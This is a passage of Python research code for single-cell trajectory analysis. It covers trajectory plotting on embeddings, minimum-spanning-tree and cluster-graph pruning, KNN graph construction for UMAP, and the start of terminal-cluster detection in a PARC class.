super_start_x = X_dimred[sc_supercluster_nn[start], 0] # df[df['super_cluster'] == start].mean()['x']
super_end_x = X_dimred[sc_supercluster_nn[end], 0] # df[df['super_cluster'] == end].mean()['x']
super_start_y = X_dimred[sc_supercluster_nn[start], 1] # df[df['super_cluster'] == start].mean()['y']
super_end_y = X_dimred[sc_supercluster_nn[end], 1] # df[df['super_cluster'] == end].mean()['y']
if super_start_x > super_end_x: direction_arrow = -1
ext_maxx = False
minx = min(super_start_x, super_end_x)
maxx = max(super_start_x, super_end_x)
miny = min(super_start_y, super_end_y)
maxy = max(super_start_y, super_end_y)
x_val = np.concatenate([x_i_start, x_i_end])
y_val = np.concatenate([y_i_start, y_i_end])
idx_keep = np.where((x_val <= maxx) & (x_val >= minx))[
0] # np.where((X_dimred[:,0]<=maxx) & (X_dimred[:,0]>=minx))#
idy_keep = np.where((y_val <= maxy) & (y_val >= miny))[
0] # np.where((X_dimred[:,1]<=maxy) & (X_dimred[:,1]>=miny))#
idx_keep = np.intersect1d(idy_keep, idx_keep)
x_val = x_val[idx_keep] # X_dimred[idx_keep,0]#
y_val = y_val[idx_keep] # X_dimred[idx_keep,1]# y_val[idx_keep]
print('start and end', start, '', end)
super_mid_x = (super_start_x + super_end_x) / 2
super_mid_y = (super_start_y + super_end_y) / 2
from scipy.spatial import distance
very_straight = False
if abs(minx - maxx) <= 1:
very_straight = True
straight_level = 10
noise = 0.01
x_super = np.array(
[super_start_x, super_end_x, super_start_x, super_end_x, super_start_x + noise, super_end_x + noise,
super_start_x - noise, super_end_x - noise, super_mid_x])
y_super = np.array(
[super_start_y, super_end_y, super_start_y, super_end_y, super_start_y + noise, super_end_y + noise,
super_start_y - noise, super_end_y - noise, super_mid_y])
else:
straight_level = 3
noise = 0.1 # 0.05
x_super = np.array(
[super_start_x, super_end_x, super_start_x, super_end_x, super_start_x + noise, super_end_x + noise,
super_start_x - noise, super_end_x - noise])
y_super = np.array(
[super_start_y, super_end_y, super_start_y, super_end_y, super_start_y + noise, super_end_y + noise,
super_start_y - noise, super_end_y - noise])
for i in range(straight_level): # DO THE SAME FOR A MIDPOINT TOO
y_super = np.concatenate([y_super, y_super])
x_super = np.concatenate([x_super, x_super])
list_selected_clus = list(zip(x_val, y_val))
if (len(list_selected_clus) >= 1) & (very_straight == True):
dist = distance.cdist([(super_mid_x, super_mid_y)], list_selected_clus, 'euclidean')
if len(list_selected_clus) >= 2:
k = 2
else:
k = 1
midpoint_loc = dist[0].argsort()[:k] # np.where(dist[0]==np.min(dist[0]))[0][0]
midpoint_xy = []
for i in range(k):
midpoint_xy.append(list_selected_clus[midpoint_loc[i]])
noise = 0.05
if k == 1:
mid_x = np.array([midpoint_xy[0][0], midpoint_xy[0][0] + noise, midpoint_xy[0][
0] - noise]) # ,midpoint_xy[1][0], midpoint_xy[1][0] + noise, midpoint_xy[1][0] - noise])
mid_y = np.array([midpoint_xy[0][1], midpoint_xy[0][1] + noise, midpoint_xy[0][
1] - noise]) # ,midpoint_xy[1][1], midpoint_xy[1][1] + noise, midpoint_xy[1][1] - noise])
if k == 2:
mid_x = np.array(
[midpoint_xy[0][0], midpoint_xy[0][0] + noise, midpoint_xy[0][0] - noise, midpoint_xy[1][0],
midpoint_xy[1][0] + noise, midpoint_xy[1][0] - noise])
mid_y = np.array(
[midpoint_xy[0][1], midpoint_xy[0][1] + noise, midpoint_xy[0][1] - noise, midpoint_xy[1][1],
midpoint_xy[1][1] + noise, midpoint_xy[1][1] - noise])
for i in range(3):
mid_x = np.concatenate([mid_x, mid_x])
mid_y = np.concatenate([mid_y, mid_y])
x_super = np.concatenate([x_super, mid_x])
y_super = np.concatenate([y_super, mid_y])
x_val = np.concatenate([x_val, x_super])
y_val = np.concatenate([y_val, y_super])
x_val = x_val.reshape((len(x_val), -1))
y_val = y_val.reshape((len(y_val), -1))
xp = np.linspace(minx, maxx, 500)
gam50 = pg.LinearGAM(n_splines=4, spline_order=3, lam=10).gridsearch(x_val, y_val)
XX = gam50.generate_X_grid(term=0, n=500)
preds = gam50.predict(XX)
if ext_maxx == False:
idx_keep = np.where((xp <= (maxx)) & (xp >= (minx)))[0] # minx+3
else:
idx_keep = np.where((xp <= (maxx)) & (xp >= (minx)))[0] # maxx-3
# cc = ['black', 'red', 'blue', 'yellow', 'pink'][random.randint(0, 4)]
ax2.plot(XX, preds, linewidth=1, c='dimgray')
# med_loc = np.where(xp == np.median(xp[idx_keep]))[0]
mean_temp = np.mean(xp[idx_keep])
closest_val = xp[idx_keep][0]
closest_loc = idx_keep[0]
for i, xp_val in enumerate(xp[idx_keep]):
if abs(xp_val - mean_temp) < abs(closest_val - mean_temp):
closest_val = xp_val
closest_loc = idx_keep[i]
step = 1
if direction_arrow == 1: # smooth instead of preds
ax2.arrow(xp[closest_loc], preds[closest_loc], xp[closest_loc + step] - xp[closest_loc],
preds[closest_loc + step] - preds[closest_loc], shape='full', lw=0, length_includes_head=True,
head_width=.2, color='dimgray') # , head_starts_at_zero = direction_arrow )
else:
ax2.arrow(xp[closest_loc], preds[closest_loc], xp[closest_loc - step] - xp[closest_loc],
preds[closest_loc - step] - preds[closest_loc], shape='full', lw=0, length_includes_head=True,
head_width=.2, color='dimgray')
x_cluster = df_mean['x']
y_cluster = df_mean['y']
num_parc_group = len(set(cluster_labels))
c_edge = []
width_edge = []
pen_color = []
super_cluster_label = []
terminal_count_ = 0
dot_size = []
for i in range(len(set(super_cluster_labels))):
if i in final_super_terminal:
print('super cluster', i, 'is a super terminal with sub_terminal cluster',
sub_terminal_clusters[terminal_count_])
width_edge.append(2)
c_edge.append('yellow')
pen_color.append('black')
super_cluster_label.append('TS' + str(sub_terminal_clusters[terminal_count_]))
dot_size.append(60)
terminal_count_ = terminal_count_ + 1
else:
width_edge.append(0)
c_edge.append('black')
pen_color.append('grey')
super_cluster_label.append('')
dot_size.append(40)
# ax2.scatter(x_cluster, y_cluster, c='red') #doesnt visualize as well to just take the embedding cluster-mean x,y values
# text annotations for the super cluster locations
# for i, type in enumerate(pt_str):
# ax2.text(df_super_mean['x'][i], df_super_mean['y'][i], 'C' + str(i), weight='bold')
# for i in range(len(x_cluster)):
# ax2.text(x_cluster[i], y_cluster[i], 'c' + str(i))
ax2.set_title('lazy:' + str(x_lazy) + ' teleport' + str(alpha_teleport) + 'super_knn:' + str(knn))
# ax2.set_title('super_knn:' + str(knn) )
ax2.scatter(X_dimred[:, 0], X_dimred[:, 1], c=projected_sc_pt, cmap='viridis_r', alpha=0.5)
# ax2.scatter(df_super_mean['x'], df_super_mean['y'], c='black', s=60, edgecolors = c_edge, linewidth = width_edge)
count_ = 0
for i, c, w, pc, dsz in zip(sc_supercluster_nn, c_edge, width_edge, pen_color, dot_size):
ax2.scatter(X_dimred[i, 0], X_dimred[i, 1], c='black', s=dsz, edgecolors=c, linewidth=w)
ax2.text(X_dimred[i, 0] + 0.5, X_dimred[i, 1] + 0.5, super_cluster_label[count_],
color=pc) # using the SC_NN location is good
count_ = count_ + 1
plt.title(title_str)
return
def draw_trajectory_dimred(X_dimred, sc_supercluster_nn, cluster_labels, super_cluster_labels, super_edgelist, x_lazy,
alpha_teleport,
projected_sc_pt, true_label, knn, ncomp, final_super_terminal,
title_str="hitting times", ):
x = X_dimred[:, 0]
y = X_dimred[:, 1]
df = pd.DataFrame({'x': x, 'y': y, 'cluster': cluster_labels, 'super_cluster': super_cluster_labels,
'projected_sc_pt': projected_sc_pt},
columns=['x', 'y', 'cluster', 'super_cluster', 'projected_sc_pt'])
df_mean = df.groupby('cluster', as_index=False).mean()
sub_cluster_isin_supercluster = df_mean[['cluster', 'super_cluster']]
sub_cluster_isin_supercluster = sub_cluster_isin_supercluster.sort_values(by='cluster')
sub_cluster_isin_supercluster['int_supercluster'] = sub_cluster_isin_supercluster['super_cluster'].round(1).astype(
int)
df_super_mean = df.groupby('super_cluster', as_index=False).mean()
pt = df_super_mean['projected_sc_pt'].values
pt_int = [int(i) for i in pt]
pt_str = [str(i) for i in pt_int]
pt_sub = [str(int(i)) for i in df_mean['projected_sc_pt'].values]
f, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
num_parc_group = len(set(true_label))
line = np.linspace(0, 1, num_parc_group)
for color, group in zip(line, set(true_label)):
where = np.where(np.array(true_label) == group)[0]
ax1.scatter(X_dimred[where, 0], X_dimred[where, 1], label=group, c=np.asarray(plt.cm.jet(color)).reshape(-1, 4))
ax1.legend(fontsize=6)
ax1.set_title('true labels, ncomps:' + str(ncomp) + '. knn:' + str(knn))
for e_i, (start, end) in enumerate(super_edgelist):
if pt[start] >= pt[end]:
temp = end
end = start
start = temp
x_i_start = df[df['super_cluster'] == start].groupby('cluster').mean()['x'].values
y_i_start = df[df['super_cluster'] == start].groupby('cluster').mean()['y'].values
x_i_end = df[df['super_cluster'] == end].groupby('cluster').mean()['x'].values
y_i_end = df[df['super_cluster'] == end].groupby('cluster').mean()['y'].values
direction_arrow = 1
super_start_x = X_dimred[sc_supercluster_nn[start], 0] # df[df['super_cluster'] == start].mean()['x']
super_end_x = X_dimred[sc_supercluster_nn[end], 0] # df[df['super_cluster'] == end].mean()['x']
super_start_y = X_dimred[sc_supercluster_nn[start], 1] # df[df['super_cluster'] == start].mean()['y']
super_end_y = X_dimred[sc_supercluster_nn[end], 1] # df[df['super_cluster'] == end].mean()['y']
if super_start_x > super_end_x: direction_arrow = -1
ext_maxx = False
minx = min(super_start_x, super_end_x)
maxx = max(super_start_x, super_end_x)
miny = min(super_start_y, super_end_y)
maxy = max(super_start_y, super_end_y)
x_val = np.concatenate([x_i_start, x_i_end])
y_val = np.concatenate([y_i_start, y_i_end])
idx_keep = np.where((x_val <= maxx) & (x_val >= minx))[0]
idy_keep = np.where((y_val <= maxy) & (y_val >= miny))[0]
print('len x-val before intersect', len(x_val))
idx_keep = np.intersect1d(idy_keep, idx_keep)
x_val = x_val[idx_keep]
y_val = y_val[idx_keep]
super_mid_x = (super_start_x + super_end_x) / 2
super_mid_y = (super_start_y + super_end_y) / 2
from scipy.spatial import distance
very_straight = False
if abs(minx - maxx) <= 1:
very_straight = True
straight_level = 10
noise = 0.01
x_super = np.array(
[super_start_x, super_end_x, super_start_x, super_end_x, super_start_x + noise, super_end_x + noise,
super_start_x - noise, super_end_x - noise, super_mid_x])
y_super = np.array(
[super_start_y, super_end_y, super_start_y, super_end_y, super_start_y + noise, super_end_y + noise,
super_start_y - noise, super_end_y - noise, super_mid_y])
else:
straight_level = 3
noise = 0.1 # 0.05
x_super = np.array(
[super_start_x, super_end_x, super_start_x, super_end_x, super_start_x + noise, super_end_x + noise,
super_start_x - noise, super_end_x - noise])
y_super = np.array(
[super_start_y, super_end_y, super_start_y, super_end_y, super_start_y + noise, super_end_y + noise,
super_start_y - noise, super_end_y - noise])
for i in range(straight_level): # DO THE SAME FOR A MIDPOINT TOO
y_super = np.concatenate([y_super, y_super])
x_super = np.concatenate([x_super, x_super])
list_selected_clus = list(zip(x_val, y_val))
if (len(list_selected_clus) >= 1) & (very_straight == True):
dist = distance.cdist([(super_mid_x, super_mid_y)], list_selected_clus, 'euclidean')
print('dist', dist)
if len(list_selected_clus) >= 2:
k = 2
else:
k = 1
midpoint_loc = dist[0].argsort()[:k] # np.where(dist[0]==np.min(dist[0]))[0][0]
print('midpoint loc', midpoint_loc)
midpoint_xy = []
for i in range(k):
midpoint_xy.append(list_selected_clus[midpoint_loc[i]])
# midpoint_xy = list_selected_clus[midpoint_loc]
noise = 0.05
print(midpoint_xy, 'is the midpoint between clus', pt[start], 'and ', pt[end])
if k == 1:
mid_x = np.array([midpoint_xy[0][0], midpoint_xy[0][0] + noise, midpoint_xy[0][
0] - noise]) # ,midpoint_xy[1][0], midpoint_xy[1][0] + noise, midpoint_xy[1][0] - noise])
mid_y = np.array([midpoint_xy[0][1], midpoint_xy[0][1] + noise, midpoint_xy[0][
1] - noise]) # ,midpoint_xy[1][1], midpoint_xy[1][1] + noise, midpoint_xy[1][1] - noise])
if k == 2:
mid_x = np.array(
[midpoint_xy[0][0], midpoint_xy[0][0] + noise, midpoint_xy[0][0] - noise, midpoint_xy[1][0],
midpoint_xy[1][0] + noise, midpoint_xy[1][0] - noise])
mid_y = np.array(
[midpoint_xy[0][1], midpoint_xy[0][1] + noise, midpoint_xy[0][1] - noise, midpoint_xy[1][1],
midpoint_xy[1][1] + noise, midpoint_xy[1][1] - noise])
for i in range(3):
mid_x = np.concatenate([mid_x, mid_x])
mid_y = np.concatenate([mid_y, mid_y])
x_super = np.concatenate([x_super, mid_x])
y_super = np.concatenate([y_super, mid_y])
x_val = np.concatenate([x_val, x_super])
y_val = np.concatenate([y_val, y_super])
z = np.polyfit(x_val, y_val, 2)
xp = np.linspace(minx, maxx, 500)
p = np.poly1d(z)
smooth = p(xp)
if ext_maxx == False:
idx_keep = np.where((xp <= (maxx)) & (xp >= (minx)))[0] # minx+3
else:
idx_keep = np.where((xp <= (maxx)) & (xp >= (minx)))[0] # maxx-3
ax2.plot(xp[idx_keep], smooth[idx_keep], linewidth=3, c='dimgrey')
# med_loc = np.where(xp == np.median(xp[idx_keep]))[0]
mean_temp = np.mean(xp[idx_keep])
closest_val = xp[idx_keep][0]
closest_loc = idx_keep[0]
for i, xp_val in enumerate(xp[idx_keep]):
if abs(xp_val - mean_temp) < abs(closest_val - mean_temp):
closest_val = xp_val
closest_loc = idx_keep[i]
step = 1
if direction_arrow == 1: # smooth instead of preds
ax2.arrow(xp[closest_loc], smooth[closest_loc], xp[closest_loc + step] - xp[closest_loc],
smooth[closest_loc + step] - smooth[closest_loc], shape='full', lw=0, length_includes_head=True,
head_width=1, color='dimgrey') # , head_starts_at_zero = direction_arrow )
else:
ax2.arrow(xp[closest_loc], smooth[closest_loc], xp[closest_loc - step] - xp[closest_loc],
smooth[closest_loc - step] - smooth[closest_loc], shape='full', lw=0, length_includes_head=True,
head_width=1, color='dimgrey')
x_cluster = df_mean['x']
y_cluster = df_mean['y']
num_parc_group = len(set(cluster_labels))
c_edge = []
width_edge = []
for i in range(num_parc_group):
if i in final_super_terminal:
width_edge.append(2.5)
c_edge.append('yellow')
else:
width_edge.append(0)
c_edge.append('black')
ax2.scatter(x_cluster, y_cluster, c='red')
for i, type in enumerate(pt_str):
ax2.text(df_super_mean['x'][i], df_super_mean['y'][i], 'C' + str(i), weight='bold')
for i in range(len(x_cluster)):
ax2.text(x_cluster[i], y_cluster[i], pt_sub[i] + 'c' + str(i))
ax2.set_title('lazy:' + str(x_lazy) + ' teleport' + str(alpha_teleport) + 'super_knn:' + str(knn))
ax2.scatter(X_dimred[:, 0], X_dimred[:, 1], c=projected_sc_pt, cmap='viridis_r', alpha=0.5)
ax2.scatter(df_super_mean['x'], df_super_mean['y'], c='black', s=60, edgecolors=c_edge, linewidth=width_edge)
plt.title(title_str)
return
def csr_mst(adjacency_matrix):
# return minimum spanning tree from adjacency matrix (csr)
Tcsr = adjacency_matrix.copy()
n_components_mst, comp_labels_mst = connected_components(csgraph=Tcsr, directed=False, return_labels=True)
print('number of components before mst', n_components_mst)
print('len Tcsr data', len(Tcsr.data))
Tcsr.data = -1 * Tcsr.data
Tcsr.data = Tcsr.data - np.min(Tcsr.data)
Tcsr.data = Tcsr.data + 1
print('len Tcsr data', len(Tcsr.data))
Tcsr = minimum_spanning_tree(Tcsr) # adjacency_matrix)
n_components_mst, comp_labels_mst = connected_components(csgraph=Tcsr, directed=False, return_labels=True)
print('number of components after mst', n_components_mst)
Tcsr = (Tcsr + Tcsr.T) * 0.5 # make symmetric
print('number of components after symmetric mst', n_components_mst)
print('len Tcsr data', len(Tcsr.data))
return Tcsr
def connect_all_components(MSTcsr, cluster_graph_csr, adjacency_matrix):
# connect forest of MSTs (csr)
n_components, comp_labels = connected_components(csgraph=cluster_graph_csr, directed=False, return_labels=True)
while n_components > 1:
sub_td = MSTcsr[comp_labels == 0, :][:, comp_labels != 0]
print('minimum value of link connecting components', np.min(sub_td.data))
locxy = scipy.sparse.find(MSTcsr == np.min(sub_td.data))
for i in range(len(locxy[0])):
if (comp_labels[locxy[0][i]] == 0) & (comp_labels[locxy[1][i]] != 0):
x = locxy[0][i]
y = locxy[1][i]
minval = adjacency_matrix[x, y]
cluster_graph_csr[x, y] = minval
n_components, comp_labels = connected_components(csgraph=cluster_graph_csr, directed=False, return_labels=True)
print('number of connected componnents after reconnecting ', n_components)
return cluster_graph_csr
def local_pruning_clustergraph_mst(adjacency_matrix, global_pruning_std=1, max_outgoing=30, preserve_disconnected=True):
# larger pruning_std factor means less pruning
# the mst is only used to reconnect components that become disconnect due to pruning
from scipy.sparse.csgraph import minimum_spanning_tree
Tcsr = csr_mst(adjacency_matrix)
initial_links_n = len(adjacency_matrix.data)
n_components_0, comp_labels_0 = connected_components(csgraph=adjacency_matrix, directed=False, return_labels=True)
print('number of components before pruning', n_components_0, comp_labels_0)
adjacency_matrix = scipy.sparse.csr_matrix.todense(adjacency_matrix)
row_list = []
col_list = []
weight_list = []
neighbor_array = adjacency_matrix # not listed in in any order of proximity
n_cells = neighbor_array.shape[0]
rowi = 0
for i in range(neighbor_array.shape[0]):
row = np.asarray(neighbor_array[i, :]).flatten()
# print('row, row')
n_nonz = np.sum(row > 0)
# print('n nonzero 1', n_nonz)
n_nonz = min(n_nonz, max_outgoing)
to_keep_index = np.argsort(row)[::-1][0:n_nonz] # np.where(row>np.mean(row))[0]#
# print('to keep', to_keep_index)
updated_nn_weights = list(row[to_keep_index])
for ik in range(len(to_keep_index)):
row_list.append(rowi)
col_list.append(to_keep_index[ik])
dist = updated_nn_weights[ik]
weight_list.append(dist)
rowi = rowi + 1
final_links_n = len(weight_list)
print('final links n', final_links_n)
cluster_graph_csr = csr_matrix((np.array(weight_list), (np.array(row_list), np.array(col_list))),
shape=(n_cells, n_cells))
sources, targets = cluster_graph_csr.nonzero()
mask = np.zeros(len(sources), dtype=bool)
cluster_graph_csr.data = cluster_graph_csr.data / (np.std(cluster_graph_csr.data)) # normalize
threshold_global = np.mean(cluster_graph_csr.data) - global_pruning_std * np.std(cluster_graph_csr.data)
mask |= (cluster_graph_csr.data < (threshold_global)) # smaller Jaccard weight means weaker edge
cluster_graph_csr.data[mask] = 0
cluster_graph_csr.eliminate_zeros()
print('shape of cluster graph', cluster_graph_csr.shape)
n_components, comp_labels = connected_components(csgraph=cluster_graph_csr, directed=False, return_labels=True)
print('number of connected components after pruning', n_components)
if (preserve_disconnected == True) & (n_components > n_components_0): # preserve initial disconnected components
Td = Tcsr.todense()
Td[Td == 0] = 999.999
n_components_ = n_components
while n_components_ > n_components_0:
for i in range(n_components_0):
loc_x = np.where(comp_labels_0 == i)[0]
len_i = len(set(comp_labels[loc_x]))
print('locx', loc_x, len_i)
while len_i > 1:
s = list(set(comp_labels[loc_x]))
loc_notxx = np.intersect1d(loc_x, np.where((comp_labels != s[0]))[0])
# print('loc_notx', loc_notxx)
loc_xx = np.intersect1d(loc_x, np.where((comp_labels == s[0]))[0])
sub_td = Td[loc_xx, :][:, loc_notxx]
# print('subtd-min', np.min(sub_td))
locxy = np.where(Td == np.min(sub_td))
for i in range(len(locxy[0])):
if (comp_labels[locxy[0][i]] != comp_labels[locxy[1][i]]):
x = locxy[0][i]
y = locxy[1][i]
minval = adjacency_matrix[x, y]
print('inside reconnecting components while preserving original ', x, y, minval)
cluster_graph_csr[x, y] = minval
n_components_, comp_labels = connected_components(csgraph=cluster_graph_csr, directed=False,
return_labels=True)
loc_x = np.where(comp_labels_0 == i)[0]
len_i = len(set(comp_labels[loc_x]))
print('number of connected componnents after reconnecting ', n_components_)
'''
if (n_components > 1) & (preserve_disconnected == False):
cluster_graph_csr = connect_all_components(Tcsr, cluster_graph_csr, adjacency_matrix)
n_components, comp_labels = connected_components(csgraph=cluster_graph_csr, directed=False, return_labels=True)
'''
sources, targets = cluster_graph_csr.nonzero()
edgelist = list(zip(sources, targets))
edgeweights = cluster_graph_csr.data / (np.std(cluster_graph_csr.data))
trimmed_n = (initial_links_n - final_links_n) * 100 / initial_links_n
trimmed_n_glob = (initial_links_n - len(edgeweights)) / initial_links_n
if global_pruning_std < 0.5:
print("percentage links trimmed from local pruning relative to start", trimmed_n)
print("percentage links trimmed from global pruning relative to start", trimmed_n_glob)
return edgeweights, edgelist, comp_labels
def get_sparse_from_igraph(graph, weight_attr=None):
edges = graph.get_edgelist()
if weight_attr is None:
weights = [1] * len(edges)
else:
weights = graph.es[weight_attr]
if not graph.is_directed():
edges.extend([(v, u) for u, v in edges])
weights.extend(weights)
shape = graph.vcount()
shape = (shape, shape)
if len(edges) > 0:
return csr_matrix((weights, zip(*edges)), shape=shape)
else:
return csr_matrix(shape)
class PARC:
def __init__(self, data, true_label=None, anndata=None, dist_std_local=2, jac_std_global='median',
keep_all_local_dist='auto',
too_big_factor=0.4, small_pop=10, jac_weighted_edges=True, knn=30, n_iter_leiden=5, random_seed=42,
num_threads=-1, distance='l2', time_smallpop=15, pseudotime=False,
path='/home/shobi/Trajectory/', super_cluster_labels=False,
super_node_degree_list=False, super_terminal_cells=False, x_lazy=0.95, alpha_teleport=0.99,
root_user="root_cluster", preserve_disconnected=True, dataset="humanCD34", super_terminal_clusters=[], do_magic_bool=False, is_coarse = True, csr_full_graph='', ig_full_graph = '',csr_array_pruned='', full_neighbor_array=''):
# higher dist_std_local means more edges are kept
# highter jac_std_global means more edges are kept
if keep_all_local_dist == 'auto':
if data.shape[0] > 300000:
keep_all_local_dist = True # skips local pruning to increase speed
else:
keep_all_local_dist = False
self.data = data
self.true_label = true_label
self.anndata = anndata
self.dist_std_local = dist_std_local
self.jac_std_global = jac_std_global ##0.15 is also a recommended value performing empirically similar to 'median'
self.keep_all_local_dist = keep_all_local_dist
self.too_big_factor = too_big_factor ##if a cluster exceeds this share of the entire cell population, then the PARC will be run on the large cluster. at 0.4 it does not come into play
self.small_pop = small_pop # smallest cluster population to be considered a community
self.jac_weighted_edges = jac_weighted_edges
self.knn = knn
self.n_iter_leiden = n_iter_leiden
self.random_seed = random_seed # enable reproducible Leiden clustering
self.num_threads = num_threads # number of threads used in KNN search/construction
self.distance = distance # Euclidean distance 'l2' by default; other options 'ip' and 'cosine'
self.time_smallpop = time_smallpop
self.pseudotime = pseudotime
self.path = path
self.super_cluster_labels = super_cluster_labels
self.super_node_degree_list = super_node_degree_list
self.super_terminal_cells = super_terminal_cells
self.x_lazy = x_lazy # 1-x = probability of staying in same node
self.alpha_teleport = alpha_teleport # 1-alpha is probability of jumping
self.root_user = root_user
self.preserve_disconnected = preserve_disconnected
self.dataset = dataset
self.super_terminal_clusters = super_terminal_clusters
self.do_magic_bool = do_magic_bool
self.is_coarse = is_coarse
self.csr_full_graph = csr_full_graph
self.ig_full_graph = ig_full_graph
self.csr_array_pruned=csr_array_pruned
self.full_neighbor_array = full_neighbor_array
def knngraph_visual(self, data_visual,knn_umap =15, downsampled = False ):
k_umap = knn_umap
t0= time.time()
# neighbors in array are not listed in in any order of proximity
if downsampled == False:
self.knn_struct.set_ef(k_umap+1)
neighbor_array, distance_array = self.knn_struct.knn_query(self.data, k=k_umap)
else:
knn_struct_umap = self.make_knn_struct(visual=True, data_visual=data_visual)
knn_struct_umap.set_ef(k_umap + 1)
neighbor_array, distance_array = knn_struct_umap.knn_query(data_visual, k=k_umap)
row_list = []
n_neighbors = neighbor_array.shape[1]
n_cells = neighbor_array.shape[0]
print('ncells and neighs', n_cells, n_neighbors)
dummy = np.transpose(np.ones((n_neighbors, n_cells)) * range(0, n_cells)).flatten()
print('dummy size' , dummy.size)
row_list.extend(list(np.transpose(np.ones((n_neighbors, n_cells)) * range(0, n_cells)).flatten()))
row_min = np.min(distance_array, axis=1)
row_sigma = np.std(distance_array, axis=1)
distance_array = (distance_array - row_min[:,np.newaxis])/row_sigma[:,np.newaxis]
col_list = neighbor_array.flatten().tolist()
distance_array = distance_array.flatten()
distance_array = np.sqrt(distance_array)
distance_array = distance_array * -1
weight_list = np.exp(distance_array)
threshold = np.mean(weight_list) + 2* np.std(weight_list)
weight_list[weight_list >= threshold] = threshold
weight_list = weight_list.tolist()
print('weight list', len(weight_list))
graph = csr_matrix((np.array(weight_list), (np.array(row_list), np.array(col_list))),
shape=(n_cells, n_cells))
graph_transpose = graph.T
prod_matrix = graph.multiply(graph_transpose)
graph = graph_transpose + graph - prod_matrix
return graph
def run_umap_hnsw(self, X_input, graph, n_components = 2, alpha: float = 1.0,negative_sample_rate: int = 5,
gamma: float = 1.0, spread = 1.0, min_dist = 0.1,init_pos ='spectral',random_state =1,):
from umap.umap_ import find_ab_params, simplicial_set_embedding
import matplotlib.pyplot as plt
a, b = find_ab_params(spread, min_dist)
print('a,b, spread, dist', a,b,spread, min_dist)
t0 = time.time()
X_umap = simplicial_set_embedding(data = X_input, graph=graph, n_components= n_components, initial_alpha= alpha, a = a, b=b, n_epochs=0, metric_kwds={}, gamma=gamma, negative_sample_rate=negative_sample_rate, init=init_pos, random_state= np.random.RandomState(random_state), metric='euclidean', verbose = 1)
return X_umap
def get_terminal_clusters(self, A, markov_pt, root_ai):
n_ = A.shape[0]
if n_ <= 10: n_outlier_std = 3
if (n_ <= 40) & (n_ > 10):n_outlier_std = 2
if n_>=40: n_outlier_std = 1
pop_list = []
print('get terminal', set(self.labels), np.where(self.labels == 0))
for i in list(set(self.labels)):
pop_list.append(len(np.where(self.labels == i)[0]))
# we weight the out-degree based on the population of clusters to avoid allowing small clusters to become the terminals based on population alone
A_new = A.copy()
for i in range(A.shape[0]):
for j in range(A.shape[0]):
A_new[i, j] = A[i, j] * (pop_list[i] + pop_list[j]) / (pop_list[i] * pop_list[j])
# make an igraph graph to compute the closeness
g_dis = ig.Graph.Adjacency((A_new > 0).tolist()) # need to manually add the weights as igraph treates A>0 as boolean
g_dis.es['weights'] = 1/A_new[A_new.nonzero()] #we want "distances" not weights for closeness and betweeness
betweenness_score = g_dis.betweenness(weights = 'weights')
betweenness_score_array = np.asarray(betweenness_score)
betweenness_score_takeout_outlier = betweenness_score_array[betweenness_score_array<(np.mean(betweenness_score_array)+n_outlier_std*np.std(betweenness_score_array))]
betweenness_list = [ i for i, score in enumerate(betweenness_score) if score < (np.mean(betweenness_score_takeout_outlier) - 0 * np.std(betweenness_score_takeout_outlier))]
closeness_score = g_dis.closeness( mode='ALL', cutoff=None, weights='weights', normalized=True)
closeness_score_array = np.asarray( closeness_score)
closeness_score_takeout_outlier = closeness_score_array[closeness_score_array < (np.mean( closeness_score_array) + n_outlier_std * np.std( closeness_score_array))]
closeness_list = [i for i, score in enumerate(closeness_score) if
score < (np.mean(closeness_score_takeout_outlier) - 0 * np.std(closeness_score_takeout_outlier))]
print('closeness_score ', [(i, score) for i, score in enumerate(closeness_score)])
print('closeness_score shortlist', closeness_list)
print('betweeness_score ', [(i,score) for i, score in enumerate(betweenness_score)])
print('betweeness_score shortlist', betweenness_list)
out_deg = A_new.sum(axis=1)
in_deg = A_new.sum(axis=0)
out_deg = np.asarray(out_deg)
outdegree_score_takeout_outlier = out_deg[out_deg < (np.mean(out_deg) + n_outlier_std * np.std(out_deg))]
outdeg_list = [i for i, score in enumerate(out_deg) if score < (np.mean(outdegree_score_takeout_outlier) - 0 * np.std(outdegree_score_takeout_outlier))]
markov_pt = np.asarray(markov_pt)
markov_pt_takeout_outlier = markov_pt[markov_pt < (np.mean(markov_pt) + n_outlier_std * np.std(markov_pt))]
print('number of clusters', n_)
if n_ <= 10:
loc_deg = np.where(out_deg <= np.percentile(out_deg, 50))[0]
print('low deg super', loc_deg)
loc_pt = np.where(markov_pt >= np.percentile(markov_pt, 60))[
0] # 60 Ttoy #10 for human but not sure ever in play
loc_deg_in = np.where(in_deg <= np.percentile(in_deg, 10))[0]
print('high pt super', loc_pt)
if (n_ <= 40) & (n_ > 10):
loc_deg = np.where(out_deg <= np.percentile(out_deg, 50))[
0] # np.mean(out_deg[out_deg>(np.mean(out_deg)-1*np.std(out_deg))]))[0]#np.percentile(out_deg, 50))[0]#np.mean(out_deg[out_deg>(np.mean(out_deg)-1*np.std(out_deg))]))[0]#np.percentile(out_deg, 50))[0] # 30 for Toy #was 50 for Human
loc_deg_in = np.where(in_deg <= np.percentile(in_deg, 20))[0]
print('low deg super', loc_deg)
print('low in-deg super', loc_deg_in)
loc_pt = np.where(markov_pt >= np.percentile(markov_pt, 10))[0] # 60 Toy #10 Human
print('high pt super', loc_pt)
if n_ > 40:
loc_deg = np.where(out_deg <= np.percentile(out_deg, 50))[0] # 15 Toy
print('low deg', loc_deg)
loc_pt = np.where(markov_pt >= np.percentile(markov_pt, 40))[0] # 60Toy #30 Human
print('high pt', loc_pt)
loc_deg_in = np.where(in_deg <= np.percentile(in_deg, 10))[0]
loc_deg = outdeg_list
terminal_clusters_1 = list(set(closeness_list)&set(betweenness_list))
terminal_clusters_2 = list(set(closeness_list) & set(loc_deg))
terminal_clusters_3 = list(set(betweenness_list) & set(loc_deg))
terminal_clusters = list(set(terminal_clusters_1)|set(terminal_clusters_2))
terminal_clusters = list(set(terminal_clusters)|set(terminal_clusters_3))
terminal_clusters = list(set(terminal_clusters) & set(loc_pt))
terminal_org = terminal_clusters.copy()
print('original terminal clusters', terminal_org)
for terminal_i in terminal_org:
removed_terminal_i = False
# print('terminal state', terminal_i)
count_nn = 0
neigh_terminal = np.where(A[:, terminal_i] > 0)[0]
if neigh_terminal.size > 0:
for item in neigh_terminal:
# print('terminal state', terminal_i)
if item in terminal_clusters:
print('item and terminal',
item, terminal_clusters)
count_nn = count_nn + 1
if item == root_ai: # if the terminal state is a neighbor of
terminal_clusters.remove(terminal_i)
print('we removed cluster', terminal_i, 'from the shortlist of terminal states ')
removed_terminal_i = True
if count_nn >= 3:
